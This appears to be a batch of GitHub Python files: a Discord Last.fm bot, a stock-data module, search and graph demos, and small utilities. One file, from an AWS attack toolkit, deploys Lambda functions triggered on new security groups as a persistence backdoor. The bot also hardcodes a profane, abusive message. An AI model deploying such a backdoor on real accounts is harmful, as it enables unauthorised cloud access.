make_top_artist_dict(parsed_content):\n \"\"\"Given a parsed json page, make a dict of top artists\"\"\"\n top_artists = parsed_content['topartists']['artist']\n top_artists_dict = dict()\n\n for artist in top_artists:\n name = artist['name']\n playcount = int(artist['playcount'])\n top_artists_dict[name] = playcount\n\n return top_artists_dict\n\n\ndef get_top_artists(user):\n \"\"\"Find a user's most scrobbled artists\"\"\"\n method = \"user.getTopArtists\"\n top_artist_dict = dict()\n\n page = 1\n page_url = get_page_url(method, user, page)\n request = requests.get(page_url)\n\n while request.status_code == 200:\n content = request.text\n parsed_content = json.loads(content)\n\n error = None\n try:\n error = parsed_content['error']\n except KeyError as err:\n pass\n\n if error is None:\n top_artist_dict = {**top_artist_dict,\n **make_top_artist_dict(parsed_content)}\n if len(parsed_content['topartists']['artist']) == 1000:\n page += 1\n page_url = get_page_url(method, user, page)\n request = requests.get(page_url)\n else:\n return top_artist_dict\n\n return None\n \n\ndef get_primary_color(image_url):\n \"\"\"Get the primary color of the currently playing album\"\"\"\n try:\n urllib.request.urlretrieve(image_url, \"album_art.jpg\")\n except:\n return int(\"0xffffff\", 0)\n\n palette = colorific.extract_colors(\"album_art.jpg\")\n primary_color_rgb = palette.colors[0].value\n primary_color = \"0x\" + colorific.rgb_to_hex(primary_color_rgb)[1:]\n\n return int(primary_color, 0)\n \n\ndef user_is_me(ctx):\n return ctx.message.author.id == \"359613794843885569\"\n\n\nclass LastfmCog:\n \"\"\"Cog class\"\"\"\n\n def __init__(self, bot):\n \"\"\"Constructor for cog class\n\n Takes as input a Bot object.\n \"\"\"\n self.bot = bot\n\n # Dictionaries to keep track of commands to show top artists, since\n # these commands are sensitive to reactions.\n self.top_artist_msgs = {}\n\n @commands.group(pass_context=True, aliases=[\"fm\"])\n async def lastfm(self, ctx):\n \"\"\"Display last played, number of artist scrobbles, and top artists\"\"\"\n channel_id = ctx.message.channel.id\n author_id = ctx.message.author.id\n\n bad_permissions = \"Sorry, you cannot use that command here.\"\n bad_username = (\"Please set a lastfm username in <#245685218055290881> first, \"\n \"using .fm set username.\")\n bad_last_played = \"I could not find your last played song.\"\n\n # Invokes any subcommand given.\n subcommand = ctx.invoked_subcommand\n if subcommand:\n return\n\n # Bad channel permissions.\n if channel_id not in permissions_data.get_allowed_channels(\"lastfm\"):\n await self.bot.say(bad_permissions)\n return\n\n user = lastfm_data.get_user(author_id)\n if user is None:\n await self.bot.say(bad_username)\n return\n\n last_played = get_last_played(user)\n if last_played is None:\n await self.bot.say(bad_last_played)\n return\n \n if ctx.message.channel.id == \"243129311421399050\":\n await commands.Command.invoke(self.embed_last_played, ctx)\n else:\n await commands.Command.invoke(self.embed_last_played_no_cooldown, ctx)\n\n @commands.command(pass_context=True)\n @commands.cooldown(1, COOLDOWN, commands.BucketType.user)\n async def embed_last_played(self, ctx):\n \"\"\"Create an embed from last played data\"\"\"\n author = ctx.message.author\n author_id = author.id\n avatar_url = author.avatar_url\n\n user = lastfm_data.get_user(author_id)\n last_played = get_last_played(user)\n\n name, artist, album, image_url = last_played\n if album == '':\n album = '\\u200b'\n\n user_search_url = 
\"https://www.last.fm/user/{}\".format(user)\n\n color = get_primary_color(image_url)\n\n embed = discord.Embed(colour=color, description=name)\n embed.add_field(name=artist, value=album)\n\n embed.set_author(name=user, icon_url=avatar_url, url=user_search_url)\n embed.set_thumbnail(url=image_url)\n\n await self.bot.say(embed=embed)\n\n @commands.command(pass_context=True)\n async def embed_last_played_no_cooldown(self, ctx):\n \"\"\"Create an embed from last played data\"\"\"\n author = ctx.message.author\n author_id = author.id\n avatar_url = author.avatar_url\n\n user = lastfm_data.get_user(author_id)\n last_played = get_last_played(user)\n\n name, artist, album, image_url = last_played\n if album == '':\n album = '\\u200b'\n\n user_search_url = \"https://www.last.fm/user/{}\".format(user)\n\n color = get_primary_color(image_url)\n\n embed = discord.Embed(colour=color, description=name)\n embed.add_field(name=artist, value=album)\n\n embed.set_author(name=user, icon_url=avatar_url, url=user_search_url)\n embed.set_thumbnail(url=image_url)\n\n await self.bot.say(embed=embed)\n\n @lastfm.command(pass_context=True)\n async def set(self, ctx, user):\n \"\"\"Add a user's lastfm username to table\"\"\"\n channel_id = ctx.message.channel.id\n author_id = ctx.message.author.id\n\n bad_permissions = \"Sorry, you cannot use that command here.\"\n bad_username = \"That is not a valid lastfm username.\"\n\n channels = permissions_data.get_allowed_channels(\"lastfm set\")\n if channel_id not in channels:\n await self.bot.say(bad_permissions)\n return\n\n if not is_username(user):\n await self.bot.say(bad_username)\n return\n\n lastfm_data.add_user(author_id, user)\n await self.bot.say(\"Username successfully set!\")\n\n @lastfm.command(pass_context=True)\n async def scrobbles(self, ctx, *args):\n \"\"\"Display the number of times a user has scrobbled an artist\"\"\"\n artist = \"\"\n for word in args:\n artist += word + \" \"\n artist = artist[:-1]\n\n channel_id = ctx.message.channel.id\n author_id = ctx.message.author.id\n author_name = ctx.message.author.name\n\n bad_permissions = \"Sorry, you cannot use that command here.\"\n bad_username = \"Please set a lastfm username first.\"\n\n channels = permissions_data.get_allowed_channels(\"lastfm scrobbles\")\n if channel_id not in channels:\n await self.bot.say(bad_permissions)\n return\n\n user = lastfm_data.get_user(author_id)\n if not user:\n await self.bot.say(bad_username)\n return\n\n num_scrobbles = get_num_scrobbles_of_artist(user, artist)\n await self.bot.say(author_name + \" has scrobbled \" + artist + \" \" +\n str(num_scrobbles) + \" times.\")\n\n @embed_last_played.error\n async def embed_last_played_error(self, error, ctx):\n \"\"\"Display any error messages produced by embed\"\"\"\n author_id = ctx.message.author.id\n voice_id = \"245685218055290881\"\n if(isinstance(error, commands.CommandOnCooldown) and\n ctx.message.server.id == \"243129311421399050\"):\n if ctx.message.author.id != \"387046431262769153\":\n mins = int(error.retry_after / 60)\n secs = int(error.retry_after % 60)\n cooldown_msg = (\"<@\" + author_id + \">. Hi, sweetie! Mommy here, \" +\n \"saying you need to take it easy on the fms! Try waiting \" +\n \"another {}m, {}s for me, how about that? :heart:\")\n await self.bot.send_message(self.bot.get_channel(voice_id),\n cooldown_msg.format(mins, secs))\n else:\n cooldown_msg = (\"Are you fucking kidding me. Is 'frawg' supposed to be a fun name \" +\n \"or is it an accurate representation of your intelligence level? How. 
\" +\n \"many. fucking. times. do i Have to haul my fucking ass to send you this \" +\n \"message when you could have just fucking WAITED. FUCK FUCK FUCK\")\n await self.bot.send_message(ctx.message.channel, cooldown_msg)\n elif ctx.message.server.id == \"243129311421399050\":\n await self.bot.say(\"Unknown error occurred.\")\n\n\ndef setup(bot):\n \"\"\"Attach the lastfm cog to a bot\"\"\"\n cog = LastfmCog(bot)\n bot.add_cog(cog)\n","repo_name":"spiegel421/musicord-bot","sub_path":"cogs/lastfm_cog.py","file_name":"lastfm_cog.py","file_ext":"py","file_size_in_byte":13240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"9265024369","text":"#! /user/bin/env python\n# -*- coding=utf-8 -*-\n\nimport os\nimport pandas as pd\nfrom datetime import datetime, timedelta\nfrom quotations.constants import CACHE_PATH\nfrom quant_backend.util.hdf5Function import hdf5\nfrom quant_backend.util.cache import cache\nfrom quant_backend.models import engine\nfrom quotations.constants import INDEXS\nfrom quotations.manager.logManager import simulation_logger\nfrom quant_backend.util.utils import f14\nfrom quotations.manager.redisManager import RedisManager\nredisManager=RedisManager('data_10')\n\n\n\nclass DataCollection:\n \"\"\"\n 数据采集模块\n \"\"\"\n def __init__(self):\n self.Hdf = hdf5(os.path.join(CACHE_PATH, 'hanqing.h5'))\n self.mysql_Hdf = hdf5(os.path.join(CACHE_PATH, 'quota.h5'))\n self.suspned_Hdf = hdf5(os.path.join(CACHE_PATH, 'suspend.h5'))\n self.redis = redisManager\n\n def get_limit_move(self,stock:str):\n \"\"\"\n 得到涨跌停情况,当前价小于等于跌停价就是跌停,大于等于涨停价就是涨停,都是就是正常,异常返回值是2,不能买卖\n 涨停是1,不能卖,跌停是-1,不能卖\n :param stock:查询个股\n :return:\n \"\"\"\n try:\n stock = f14(stock)\n result = self.redis.hmget('stkRealTimeState:{}_14901'.format(stock),['high','nMatch','low'])\n if float(result[1]) >= float(result[0]):\n return 1,round(float(result[1]),2)\n elif float(result[1]) <= float(result[2]):\n return -1,round(float(result[1]),2)\n else:\n return 0,round(float(result[1]),2)\n except:\n return 2,'获取行情失败:{},无法买卖'.format('stkRealTimeState:{}_14901'.format(f14(stock)))\n\n def get_status_price(self,stock:str):\n \"\"\"\n 得到是否停牌和最新股价\n :return:\n \"\"\"\n try:\n stock = f14(stock)\n result = self.redis.hmget('stkRealTimeState:{}_14901'.format(stock),['stockStatus','nMatch'])\n if result[0] == '0':\n return True,round(float(result[1]),2)\n else:\n return False,round(float(result[1]),2)\n except:\n return False,None\n\n def close(self):\n self.Hdf.close()\n self.mysql_Hdf.close()\n self.suspned_Hdf.close()\n\n def xbar(self, stock, day=None, type=0):\n stock = stock[0:6]\n df = cache.get('hq_{}'.format(stock))\n if df is None or len(df) == 0:\n df = self.Hdf.select('/df_{}'.format(stock))\n cache.add('hq_{}'.format(stock), df)\n\n if df is not None:\n if type == 0:\n try:\n close, ltm = df.loc[day]\n return [{'day': day, 'close': round(close,2), 'ltm':ltm}]\n except Exception as e:\n simulation_logger.info('miss:{}:{}:{}'.format(e, stock, day))\n return []\n else:\n df = df[df.index <= day]\n if not df.empty:\n close = df['close'].values[-1]\n ltm = df['ltm'].values[-1]\n day = df.index[-1]\n return [{'day': day, 'close': round(close,2), 'ltm':ltm}]\n else:\n return []\n else:\n return []\n\n def find_suspendeds(self, day):\n # 停牌股\n day = '/suspend_' + str(day).replace('-', '')\n df = self.suspned_Hdf.select(day)\n if df is not None:\n return list(df['code'])\n else:\n return []\n\n def find_pinds(self, day):\n # 涨跌停股\n df = cache.get('find_pinds')\n if df is 
None or len(df) == 0:\n df = pd.read_sql('select * from pind', engine)\n cache.add('find_pinds', df)\n return list(df[(df['date'] == day) & (df['status'] == 1)]['code'])\n\n def find_stock_codes(self):\n df = cache.get('find_stock_codes')\n if df is not None and len(df) > 0:\n return df\n else:\n df = pd.read_sql('select code from basic', engine)\n stocks = list(df['code'])\n cache.add('find_stock_codes', stocks)\n return stocks\n\n def find_st(self, date):\n '''Get ST stocks'''\n df = cache.get('find_st')\n if df is None or len(df) == 0:\n df = pd.read_sql(\n 'select code, entry_dt, remove_dt from st', engine)\n df[['entry_dt', 'remove_dt']] = df[[\n 'entry_dt', 'remove_dt']].astype(str)\n cache.add('find_st', df)\n return list(df[(df['entry_dt'] <= date) & (\n df['remove_dt'] >= date)]['code'])\n\n def find_second_new(self, date):\n '''Get sub-new stocks (listed within the past year)'''\n df = cache.get('find_second_new')\n if df is None or len(df) == 0:\n df = pd.read_sql(\n 'select code,list_date,delist_date from basic', engine)\n df[['list_date', 'delist_date']] = df[[\n 'list_date', 'delist_date']].astype(str)\n cache.add('find_second_new', df)\n return list(df[df['list_date'] > str(datetime.strptime(\n date, '%Y-%m-%d').date() - timedelta(days=365))]['code'])\n\n def find_regionals_code(self, date, region=None):\n '''Get stocks by region'''\n df = cache.get('find_regionals_code')\n if df is None or len(df) == 0:\n df = pd.read_sql('select code, region from regionals', engine)\n cache.add('find_regionals_code', df)\n if region:\n return list(df[df['region'].isin(region)]['code'])\n return list(df['code'])\n\n def find_margin_code(self, date):\n '''Filter margin-trading stocks'''\n df = cache.get('find_margin_code')\n if df is None or len(df) == 0:\n df = pd.read_sql(\n 'select code, date from margintrade WHERE date = \"{}\"'.format(date),\n engine)\n df[['date']] = df[['date']].astype(str)\n return list(df[df['date'] == date]['code'])\n\n def find_conseption(self, date, industry=None):\n '''Filter stocks by date and concept sector'''\n df = cache.get('find_conseption')\n if df is None or len(df) == 0:\n df = pd.read_sql(\n 'select gn_code as category, code, list_date, delist_date from conseption', engine)\n df[['list_date', 'delist_date']] = df[[\n 'list_date', 'delist_date']].astype(str)\n cache.add('find_conseption', df)\n return list(df[(df['category'].isin(industry)) & (\n df['list_date'] <= date) & (df['delist_date'] > date)]['code'])\n\n def find_index_code(self, date, index):\n '''Get index constituent stocks, the category may be an 'in' list'''\n category = [INDEXS.get(str(i), i) for i in index]\n df = cache.get('find_index_code')\n if df is None or len(df) == 0:\n df = pd.read_sql(\n 'select code, category, list_date, delist_date from indexs', engine)\n df[['list_date', 'delist_date']] = df[[\n 'list_date', 'delist_date']].astype(str)\n cache.add('find_index_code', df)\n return list(df[(df['category'].isin(category)) & (\n df['list_date'] <= date) & (df['delist_date'] > date)]['code'])\n\n def find_industry_code(self, date, index):\n '''Get industry constituent stocks'''\n df = cache.get('find_industry_code')\n if df is None or len(df) == 0:\n df = pd.read_sql(\n 'select code, industry_code, hy_code, start_date, end_date from industry',\n engine)\n df[['start_date', 'end_date']] = df[[\n 'start_date', 'end_date']].astype(str)\n cache.add('find_industry_code', df)\n return list(df[(df['hy_code'].isin(index)) & (\n df['start_date'] <= date) & (df['end_date'] > date)]['code'])\n\n def find_all_code(self, date):\n '''Get all stocks'''\n df = cache.get('find_all_code')\n if df is None or len(df) == 0:\n df = pd.read_sql(\n 'select code, list_date, delist_date from 
basic', engine)\n df[['list_date', 'delist_date']] = df[[\n 'list_date', 'delist_date']].astype(str)\n cache.add('find_all_code', df)\n return list(df[(df['list_date'] <= str(date)) &\n (df['delist_date'] > date)]['code'])\n\n def find_ah_connection(self, date):\n df = cache.get('find_ah_connection')\n if df is None or len(df) == 0:\n df = pd.read_sql(\n 'select sse_code from hh_stock_connection', engine)\n cache.add('find_ah_connection', df)\n return list(df['sse_code'])\n\n def benchmark_history(self, code, date, end_date):\n if not date:\n timing = pd.read_sql(\n \"select code, date, befor_day, niubear, ups, open, close from timing as t where code='{}' ORDER BY date DESC limit 1\".format(\n code), engine)\n else:\n timing = pd.read_sql(\n \"select code, date, befor_day, niubear, ups, open, close from timing where code='{}' and date>='{}' and date<='{}' order by date\".format(\n code,\n date,\n end_date),\n engine)\n timing.index = pd.to_datetime(timing['date'])\n timing['date'] = timing['date'].astype(str)\n timing['befor_day'] = timing['befor_day'].astype(str)\n return timing\n","repo_name":"likeweilikewei/Distributed-quantitative-automatic-trading-framework","sub_path":"quant_backend/rocket/data_collection/data_collection.py","file_name":"data_collection.py","file_ext":"py","file_size_in_byte":9520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"31116970237","text":"from tkinter import *\r\nroot = Tk()\r\nroot.geometry(\"500x550\")\r\nroot.title('Shift-OR Sequential Search')\r\n\r\n\r\ndef to_bin(n, width=32):\r\n \"Pad a binary number to WIDTH bits wide\"\r\n s = bin(n).replace(\"0b\", \"\")\r\n return ((\"%0\" + str(width) + \"d\") % int(s))\r\ndef neg(x):\r\n #0b11111111111111111111111111111111 - x\r\n return 0b11111111111111111111111111111111 - x\r\ndef shift_or():\r\n trace = True\r\n text=variable1.get()\r\n pattern= variable2.get()\r\n \"\"\"Same as shift_and, but invert masks and use OR to \r\n avoid an | in the inner loop.\"\"\"\r\n m = len(pattern)\r\n n = len(text)\r\n neg0 = neg(0)\r\n # build table\r\n B = {} # char -> bitmask table\r\n for i in range(m):\r\n B[pattern[i]] = (B.get(pattern[i], 0) | (1 << i))\r\n B = {k: neg(B[k]) for k in B}\r\n # complement all bit masks in B, complement bit mask\r\n a = neg0\r\n hit = (1 << (m - 1))\r\n listNodes = Listbox(root, width=80, height=35)\r\n listNodes.grid(column=0, row=12)\r\n notf=0\r\n for i in range(n):\r\n a = (((a << 1) & neg0) | B.get(text[i], neg0))\r\n if trace:\r\n listNodes.insert(END, \" %s & B[%c] : %s\" % (to_bin(a), text[i], to_bin(B.get(text[i], neg0))))\r\n #print(\"%s & B[%c] : %s\" % (to_bin(a), text[i], to_bin(B.get(text[i], neg0))))\r\n\r\n\r\n if a & hit == 0:\r\n listNodes.insert(END,\"\\nPattern Found at %d\" % (i - m + 2))\r\n notf=1\r\n\r\n\r\n if notf == 0 :\r\n listNodes.insert(END, \"\\n Pattern Not Found \")\r\n\r\n\r\nvar = IntVar()\r\nvariable1=StringVar()\r\nvariable2=StringVar()# Value saved here variable2=StringVar() # Value saved here\r\nLabel(root, text = \"Shift-OR Sequential Search: \",background='skyblue' ,foreground='black').grid(row=4, column=3)\r\nLabel(root, text = \"Enter Text:\").grid(row=7, column=2)\r\nEntry(root, width=30,textvariable = variable1).grid(row=7, column=3)\r\nLabel(root, text = \"Enter Pattern: \").grid(row=9, column=2)\r\nEntry(root, width=30,textvariable = variable2).grid(row=9, column=3)\r\nButton(root, text = \"Show Results\", command= shift_or).grid(row=11, 
column=3)\r\nroot.config(bg=\"skyblue\")\r\nroot.mainloop()\r\n\r\n#place(y=25, x=130)","repo_name":"Jatan88/IR-Assignments","sub_path":"assi_10.py","file_name":"assi_10.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41840547766","text":"#!/usr/bin/env python3\nimport datetime\n\nimport argparse\nfrom botocore.exceptions import ClientError\nfrom copy import deepcopy\nimport subprocess\nimport random\nimport string\nimport os\n\ndef main(args, awsattack_main):\n session = awsattack_main.get_active_session()\n\n args = parser.parse_args(args)\n print = awsattack_main.print\n get_regions = awsattack_main.get_regions\n\n data = {'functions_created': 0, 'rules_created': 0, 'successes': 0}\n\n created_resources = {'LambdaFunctions': [], 'CWERules': []}\n\n if not args.regions:\n regions = get_regions('Lambda')\n else:\n regions = args.regions.split(',')\n\n from_port, to_port = args.port_range.split('-')\n\n target_role_arn = args.target_role_arn\n\n # Import the Lambda function and modify the variables it needs\n with open('./modules/{}/lambda_function.py.bak'.format(technique_info['name']), 'r') as f:\n code = f.read()\n\n code = code.replace('FROM_PORT', from_port).replace('TO_PORT', to_port).replace('IP_RANGE', args.ip_range).replace('IP_PROTOCOL', args.protocol)\n\n with open('./modules/{}/lambda_function.py'.format(technique_info['name']), 'w+') as f:\n f.write(code)\n\n # Zip the Lambda function\n try:\n print(' Zipping the Lambda function...\\n')\n subprocess.run('cd ./modules/{}/ && rm -f lambda_function.zip && zip lambda_function.zip lambda_function.py && cd ../../'.format(technique_info['name']), shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n except Exception as error:\n print('Failed to zip the Lambda function locally: {}\\n'.format(error))\n return data\n\n with open('./modules/{}/lambda_function.zip'.format(technique_info['name']), 'rb') as f:\n zip_file_bytes = f.read()\n\n for region in regions:\n print('Starting region {}...'.format(region))\n client = awsattack_main.get_boto3_client('lambda', region)\n\n try:\n function_name = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(15))\n response = client.create_function(\n FunctionName=function_name,\n Runtime='python3.6',\n Role=target_role_arn,\n Handler='lambda_function.lambda_handler',\n Code={\n 'ZipFile': zip_file_bytes\n }\n )\n lambda_arn = response['FunctionArn']\n print(' Created Lambda function: {}'.format(function_name))\n data['functions_created'] += 1\n created_resources['LambdaFunctions'].append('{}@{}'.format(function_name, region))\n\n client = awsattack_main.get_boto3_client('events', region)\n\n response = client.put_rule(\n Name=function_name,\n EventPattern='{\"source\":[\"aws.ec2\"],\"detail-type\":[\"AWS API Call via CloudTrail\"],\"detail\":{\"eventSource\":[\"ec2.amazonaws.com\"],\"eventName\":[\"CreateSecurityGroup\"]}}',\n State='ENABLED'\n )\n print(' Created CloudWatch Events rule: {}'.format(response['RuleArn']))\n data['rules_created'] += 1\n\n client = awsattack_main.get_boto3_client('lambda', region)\n\n client.add_permission(\n FunctionName=function_name,\n StatementId=''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10)),\n Action='lambda:InvokeFunction',\n Principal='events.amazonaws.com',\n SourceArn=response['RuleArn']\n )\n\n client = awsattack_main.get_boto3_client('events', region)\n\n response = 
client.put_targets(\n Rule=function_name,\n Targets=[\n {\n 'Id': '0',\n 'Arn': lambda_arn\n }\n ]\n )\n if response['FailedEntryCount'] > 0:\n print('Failed to add the Lambda function as a target to the CloudWatch rule. Failed entries:')\n print(response['FailedEntries'])\n else:\n print(' Added Lambda target to CloudWatch Events rule.')\n data['successes'] += 1\n created_resources['CWERules'].append('{}@{}'.format(function_name, region))\n except ClientError as error:\n code = error.response['Error']['Code']\n if code == 'AccessDeniedException':\n print(' FAILURE: MISSING NEEDED PERMISSIONS')\n else:\n print(code)\n\n if created_resources['LambdaFunctions']:\n with open('./modules/{}/created-lambda-functions.txt'.format(technique_info['name']), 'w+') as f:\n f.write('\\n'.join(created_resources['LambdaFunctions']))\n if created_resources['CWERules']:\n with open('./modules/{}/created-cloudwatch-events-rules.txt'.format(technique_info['name']), 'w+') as f:\n f.write('\\n'.join(created_resources['CWERules']))\n\n print('Warning: Your backdoor will not execute if the account does not have an active CloudTrail trail in the region it was deployed to.')\n\n return data\n\n\n","repo_name":"blackbotsecurity/AWS-Attack","sub_path":"ttp/src/lambda_backdoor_new_sec_groups_src.py","file_name":"lambda_backdoor_new_sec_groups_src.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"95"} +{"seq_id":"15647143382","text":"#!/bin/sh\n\n\"\"\":\"\nexec python $0 ${1+\"$@\"}\n\"\"\"\n\n# ---------------------- HelloBlt.py ----------------------\n# \n# This program demonstrates more basic functionality like \n# making buttons to control showing of symbols, grids etc.\n# The example also shows how to make animated graphs and \n# how to plot the graphs more or less smooth.\n# \n\nfrom tkinter import * # The Tk package\nimport Pmw # The Python MegaWidget package\nimport math # import the sin-function\n\n\ndef animate():\n # This function is completely pointless, but demonstrates\n # that it's easy to update a graph \"runtime\".\n\n for t in range(31): # In 31 steps...\n for c in range(ncurves): # ...on each curve\n for x in range(npoints): # on each point...\n vector_y[c][x] = math.sin(c*x*0.5 +math.pi*t/15)\n\n master.after(20) # wait 0.02 second\n master.update_idletasks() # update screen\n\ndef symbolsOnOff():\n global symbols\n symbols = not symbols\n\n for curvename in g.element_show():\n if symbols:\n g.element_configure(curvename, symbol='diamond')\n else:\n g.element_configure(curvename, symbol='')\n \n\ndef smooth():\n global smoothing\n \n if smoothing == 'linear': smoothing='quadratic'\n elif smoothing == 'quadratic': smoothing='natural'\n elif smoothing == 'natural': smoothing='step'\n else: smoothing = 'linear'\n\n for curvename in g.element_show():\n g.element_configure(curvename, smooth=smoothing)\n\n\nmaster = Tk() # build Tk-environment\nncurves = 4 # draw 4 curves\nnpoints = 7 # use 8 points on each curve\n\nsmoothing='linear'\nsymbols = 0\n\n# In this example we use Pmw.Blt.Vectors. 
These can mostly be used like \n# a normal list, but changes will be updated in the graph automatically.\n# Using Pmw.Blt.Vectors is often slower, but in this case very convenient.\nvector_x = Pmw.Blt.Vector() \nvector_y = []\n\nfor y in range(ncurves):\n vector_y.append(Pmw.Blt.Vector()) # make vector for y-axis\n\nfor x in range(npoints): # for each point...\n vector_x.append(x*0.1) # make an x-value\n\n # fill vectors with cool graphs\n for c in range(ncurves): # for each curve...\n vector_y[c].append(math.sin(c*x*0.5)) # make a y-value\n\ng = Pmw.Blt.Graph(master) # make a new graph area\ng.pack(expand=1, fill='both')\n\ncolor = ['red', '#ff9900', 'blue', '#00cc00', 'black', 'grey']\n\nfor c in range(ncurves): # for each curve...\n curvename = 'sin(' + str(c) +'x)' # make a curvename\n g.line_create(curvename, # and create the graph\n xdata=vector_x, # with x data,\n ydata=vector_y[c], # and y data\n color=color[c], # and a color\n dashes=0, # and no dashed line\n linewidth=2, # and 2 pixels wide\n symbol='') # ...and no disks\n \ng.configure(title='Hello BLT World') # enter a title\n \n# make a row of buttons\nbuttons = Pmw.ButtonBox(master, labelpos='n', label_text='Options')\nbuttons.pack(fill='both', expand=1, padx=10, pady=10)\n\nbuttons.add('Grid', command=g.grid_toggle)\nbuttons.add('Symbols', command=symbolsOnOff)\nbuttons.add('Smooth', command=smooth)\nbuttons.add('Animate', command=animate)\nbuttons.add('Quit', command=master.quit)\n\nmaster.mainloop() # ...and wait for input\n\n\n","repo_name":"Kara-Tenpas-Akin/P19420","sub_path":"Other/Examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26215658505","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 8 17:50:49 2020\n\n@author: RohitSharma\n\"\"\"\n\n\t\n\n\ndef segment(text, segs):\n words = []\n last = 0\n for i in range(len(segs)):\n if segs[i] == '1':\n words.append(text[last:i+1])\n last=i+1\n words.append(text[last:])\n return words\n","repo_name":"rohitk12r/experiment","sub_path":"AI-Research-Python/nltktext.py","file_name":"nltktext.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"29479467785","text":"import os\nimport glob\n\nOPENPOSE_OUTPUT_DIR_NAME = \"keypoints\"\nDEEPSORT_OUTPUT_DIR_NAME = \"ID\"\nVIDEO_TYPES = [\"mp4\", \"avi\", \"MTS\", \"mov\", \"webm\", \"flv\"]\n\n\ndef find_video_paths_in_directory(dir_path: str) -> list[str]:\n video_paths: list[str] = []\n for VIDEO_TYPE in VIDEO_TYPES:\n video_paths.extend(glob.glob(os.path.join(dir_path, f\"*{VIDEO_TYPE}\")))\n return video_paths\n\n\nos.chdir(os.path.dirname(__file__))\ninput_paths = find_video_paths_in_directory(\n os.path.join(os.path.dirname(__file__), \"inputs\")\n)\n\nif not input_paths:\n input(\"No videos found. Place videos in the inputs folder. 
\\nPress any key to exit.\")\n exit()\n\ncontainer_input_paths = [\n f\"/app/inputs/{os.path.basename(path)}\" for path in input_paths\n]\n\nfor container_input_path in container_input_paths:\n video_name = os.path.splitext(os.path.basename(container_input_path))[0]\n container_out_dir = f\"/app/outputs/{video_name}\"\n\n # OPENPOSE\n os.makedirs(\n os.path.join(\n os.path.dirname(__file__), \"outputs\", video_name, OPENPOSE_OUTPUT_DIR_NAME\n ),\n exist_ok=True,\n )\n os.system(\n f'docker compose run --rm openpose /bin/bash -c \"./build/examples/openpose/openpose.bin --video {container_input_path} --render_pose 0 --display 0 --write_json {container_out_dir}/{OPENPOSE_OUTPUT_DIR_NAME}\"'\n )\n\n # DEEPSORT\n os.makedirs(\n os.path.join(\n os.path.dirname(__file__), \"outputs\", video_name, DEEPSORT_OUTPUT_DIR_NAME\n ),\n exist_ok=True,\n )\n os.system(\n f'docker compose run --rm deepsort /bin/bash -c \"python object_tracker.py --video {container_input_path} --info {container_out_dir}/{DEEPSORT_OUTPUT_DIR_NAME} --dont_show --count\"'\n )\n","repo_name":"kou1046/lab-project","sub_path":"submodules/modules_starter.py","file_name":"modules_starter.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33099147847","text":"\"\"\"\nSharePastes\n\nHelps you quickly share code snippets via various services like Github Gist and\nPasteBin.com.\n\"\"\"\n\nfrom .core import BaseSharePastes\nfrom .core import Config\nfrom .core import SharePastesFactory\n\nextensions = {\n 'gist': ('gist', 'Gist'),\n 'pastebin': ('pastebin', 'Pastebin'),\n 'mozpastebin': ('mozpastebin', 'MozPastebin'),\n}\n\n__author__ = \"Vaidik Kapoor <kapoor.vaidik@gmail.com>\"\n__license__ = \"MIT\"\n__version__ = \".\".join(map(str, (0, 2, 0)))\n","repo_name":"vaidik/sharepastes","sub_path":"sharepastes/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"95"} +{"seq_id":"70894359993","text":"import sys\nclass Solution:\n \"\"\"\n @param: nums: A list of integers\n @return: A list of integers includes the index of the first number and the index of the last number\n \"\"\"\n def subarraySumClosest(self, nums):\n # write your code here\n preSum = [(0,-1)]\n for i, num in enumerate(nums):\n preSum.append((preSum[-1][0]+num, i))\n \n preSum.sort()\n \n mindiff, res = sys.maxsize, []\n for i in range(1, len(preSum)):\n if mindiff > abs(preSum[i][0]-preSum[i-1][0]) :\n start = min(preSum[i][1], preSum[i-1][1])+1 \n end = max(preSum[i][1], preSum[i-1][1])\n res = [start,end]\n mindiff = abs(preSum[i][0]-preSum[i-1][0])\n \n return res\n\nnums=[-3,1,1,-3,5]\ntest = Solution()\nres = test.subarraySumClosest(nums)\nprint(res)\n","repo_name":"shujuan/leetcode","sub_path":"python/subarray_sum_closest.py","file_name":"subarray_sum_closest.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"71740892474","text":"import re\n\nCOURSE_REGEX_PATTERN = \"([0-9]{2}-[0-9]{3})\\s+(\\w+)\\s+\\'([0-9]{2})\\s+\"\\\n \"([\\w+|\\*])\\s+([0-9]+\\.[0])\"\ncourse_regex = re.compile(COURSE_REGEX_PATTERN)\n\n\ndef parse_audit(audit):\n lines = audit.split(\"\\n\")\n\n courses_taken = []\n\n for line in lines:\n match = course_regex.search(line)\n if match:\n [course_id, season, year, grade, unit] = match.groups()\n courses_taken.append({\n 
